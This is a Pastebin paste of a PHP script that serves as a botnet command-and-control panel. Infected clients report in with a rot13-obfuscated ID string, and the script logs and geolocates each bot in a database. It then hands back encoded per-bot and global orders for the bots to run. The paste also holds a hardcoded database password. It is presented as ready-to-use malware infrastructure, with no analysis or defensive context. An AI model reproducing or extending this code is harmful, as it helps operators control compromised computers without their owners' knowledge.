Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?PHP
- // file: info.php
- include("geoip.inc"); // for the geoip function
- // database connection information
- $database = "test";
- $user = "test";
- $password = "zyuZtKnnzwKejQqw";
- $host = "localhost";
- // custom rot13
- function customRot13($string)
- {
- for($i=0; $i < strlen($string); $i++) {
- $c = ord($string[$i]);
- if ($c >= ord('n') & $c <= ord('z') | $c >= ord('N') & $c <= ord('Z'))
- $c -= 13;
- else if ($c >= ord('a') & $c <= ord('m') | $c >= ord('A') & $c <= ord('M'))
- $c += 13;
- else if ($c >= ord('0') & $c <= ord('4'))
- $c += 5;
- else if ($c >= ord('5') & $c <= ord('9'))
- $c -= 5;
- $string[$i] = chr($c);
- }
- return $string;
- }
- // data sanitization
- function sanitize($data)
- {
- // remove whitespaces (not a must though)
- $data = trim($data);
- // apply stripslashes if magic_quotes_gpc is enabled
- if(get_magic_quotes_gpc())
- $data = stripslashes($data);
- // a mySQL connection is required before using this function
- $data = mysql_real_escape_string($data);
- return $data;
- }
- if( isset($_GET['sid']) ) {
- // connect to the database
- $mysql = mysql_connect( $host, $user, $password );
- mysql_select_db( $database );
- // clear buffer in this format h6Yht56RfT:WIN7:50000:m1.0:7653332
- // $serial:$os:$delay:$version:$uptime
- $buffer_crypted = sanitize($_GET['sid']);
- $buffer_clear = customRot13($buffer_crypted);
- $serial = strtok($buffer_clear, ":");
- $os = strtok(":");
- $delay = strtok(":");
- $version = strtok(":");
- $uptime = strtok(":");
- $lastorder_id = 0;
- $ip = getenv("REMOTE_ADDR");
- // sanitize ints
- $delay = intval($delay);
- $uptime = intval($uptime);
- $lastorder_id = intval($lastorder_id);
- // format uptime
- $minsuptime = $uptime % 60;
- if ( $minsuptime > 1 ) $minsuptime = $minsuptime." Minutes";
- else $minsuptime = $minsuptime." Minute";
- $hoursuptime = $uptime / 60 % 24;
- if ( $hoursuptime > 1 ) $hoursuptime = $hoursuptime." Hours";
- else $hoursuptime = $hoursuptime." Hour";
- $daysuptime = $uptime / 60 / 24 % 7;
- if ( $daysuptime > 1 ) $daysuptime = $daysuptime." Days";
- else $daysuptime = $daysuptime." Day";
- $weeksuptime = $uptime / 60 / 24 / 7 % 52;
- if ( $daysuptime > 1 ) $weeksuptime = $weeksuptime." Weeks";
- else $weeksuptime = $weeksuptime." Week";
- $uptimeformated = $weeksuptime.", ".$daysuptime.", ".$hoursuptime.", ".$minsuptime;
- // geolocate IP
- $gi = geoip_open("GeoIP.dat",GEOIP_STANDARD);
- $country_code = geoip_country_code_by_addr($gi, $ip);
- $country_name = geoip_country_name_by_addr($gi, $ip);
- geoip_close($gi);
- // populate `clients` table
- if( $version != NULL ) {
- // select our client's info
- $client_sql = "SELECT * FROM `clients` WHERE serial LIKE '$serial'";
- $client_result = mysql_query( $client_sql );
- // checks if the client is new
- if( !mysql_num_rows( $client_result ) ) {
- // we have a new client, insert info into the `clients` table
- $create_client_sql = "INSERT INTO `clients`
- (
- serial, os, ip, country_code, country_name, delay, version,
- uptime, lastorder_id, registered_time, report_time
- )
- VALUES
- (
- '$serial', '$os', '$ip', '$country_code', '$country_name', '$delay', '$version',
- '$uptimeformated', '$lastorder_id', NULL, NULL
- )";
- mysql_query( $create_client_sql ); // client added
- } else { // former client update information
- // get our client's row in the `clients` table
- $client_row = mysql_fetch_assoc( $client_result );
- // get the client's $client_id
- $client_id = $client_row['client_id'];
- // get the client's $lastorder_id
- $lastorder_id = $client_row['lastorder_id'];
- // calculate the online_uptime in secs
- if ( ( time() - strtotime($client_row['report_time']) ) < ( ( $client_row['delay'] / 1000 ) + 20 ) ) // if before delay expires
- $online_uptime = $client_row['online_uptime'] + time() - strtotime($client_row['report_time']); // new uptime
- else
- $online_uptime = $client_row['online_uptime']; // else welcome back here is what your uptime was!
- $tableinfo_sql = "SELECT create_time FROM INFORMATION_SCHEMA.TABLES WHERE table_name = clients";
- $tableinfo_result = mysql_query( $tableinfo_sql );
- $tableinfo_row = mysql_fetch_row( $tableinfo_result ); // stores `clients` table creation time
- $table_uptime = time() - strtotime($tableinfo_row[0]); // total uptime for the `clients` table
- $percent_uptime = ( 1 - ( ($table_uptime - $online_uptime) / $table_uptime ) ) * 100; // uptime in %
- $percent_uptime = intval($percent_uptime); // sanitize and make it an integer
- // uptate client information
- $update_sql = "UPDATE `clients` SET
- report_time=NULL,
- version='$version',
- online_uptime='$online_uptime',
- percent_uptime='$percent_uptime',
- uptime='$uptimeformated',
- delay='$delay',
- ip='$ip',
- country_code='$country_code',
- country_name='$country_name',
- lastorder_id='$lastorder_id'
- WHERE serial LIKE '$serial'";
- $update_result = mysql_query( $update_sql );
- } // done updating the client
- // check the `orders` table to see if there is a specific order for this client
- $orders_sql = "SELECT * FROM `orders` WHERE target_id LIKE '$client_id'";
- $orders_result = mysql_query( $orders_sql );
- // if there is a specific bot command prints it out
- if( mysql_num_rows( $orders_result ) ) {
- // echo the command to the client and clear it from the `orders` table
- echo ">".customRot13("init1")."<";
- while ( $orders_row = mysql_fetch_assoc( $orders_result ) ) {
- echo ">".customRot13($orders_row['order'])."<";
- $id = $orders_row['order_id'];
- $delete_sql = "DELETE FROM `orders` WHERE order_id LIKE '$id'";
- mysql_query( $delete_sql );
- } // done printing out all orders
- } else {
- // no orders were found for that client $serial in the `orders` table
- $all_global_sql = "SELECT * FROM `global_orders`";
- $all_global_orders_result = mysql_query( $all_global_sql );
- // check the `global_orders` table for orders
- if( mysql_num_rows( $all_global_orders_result ) ) {
- // there are global orders
- // will now check the $lastorder_id of that client
- if ($lastorder_id == 0) { // never ran a global order
- // print out all the global orders it hasn't ran yet and update it's $lastorder_id
- echo ">".customRot13("init2")."<";
- while ( $global_row = mysql_fetch_assoc( $all_global_orders_result ) ) {
- // check if the command is expired
- if ( time() < strtotime($global_row['exp_time']) ) {
- echo ">".customRot13($global_row['global_order'])."<";
- // clients get the global_order_id as it's $lastorder_id
- $lastorder_id = $global_row['global_order_id'];
- $order_update_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
- mysql_query( $order_update_sql );
- } else {
- // command was old but gave it a shot here is your $lastorder_id
- $lastorder_id = $global_row['global_order_id'];
- $order_update_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
- mysql_query( $order_update_sql );
- } // done printing out the next global order
- } // done printing out all global orders
- } else { // it already ran at least one global order as it has a $lastorder_id != 0
- // check the `global_orders` table for orders
- $next_sql = "SELECT * FROM `global_orders` WHERE global_order_id > '$lastorder_id' ORDER BY global_order_id";
- $next_result = mysql_query( $next_sql );
- // check the `global_orders` table for orders matching
- if( mysql_num_rows( $next_result ) ) {
- // print out all the global orders it hasn't ran yet and update it's $lastorder_id
- echo ">".customRot13("init3")."<";
- while ( $next_row = mysql_fetch_assoc( $next_result ) ) {
- // check if the command is expired
- if ( time() < strtotime($next_row['exp_time']) ) {
- // echo the next global order for the client
- echo ">".customRot13($next_row['global_order'])."<";
- // client gets the global_order_id as it's $lastorder_id
- $lastorder_id = $next_row['global_order_id'];
- $next_order_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
- mysql_query( $next_order_sql );
- } else {
- // command was old but gave it a shot here is your $lastorder_id
- $lastorder_id = $next_row['global_order_id'];
- $next_order_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
- mysql_query( $next_order_sql );
- } // done printing out the next global order
- } // done printing out all global orders left to do
- } // no new global orders
- } // done checking for global orders
- } // no global orders
- } // done checking for orders
- } // fake or wrong sid format
- } // no sid
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement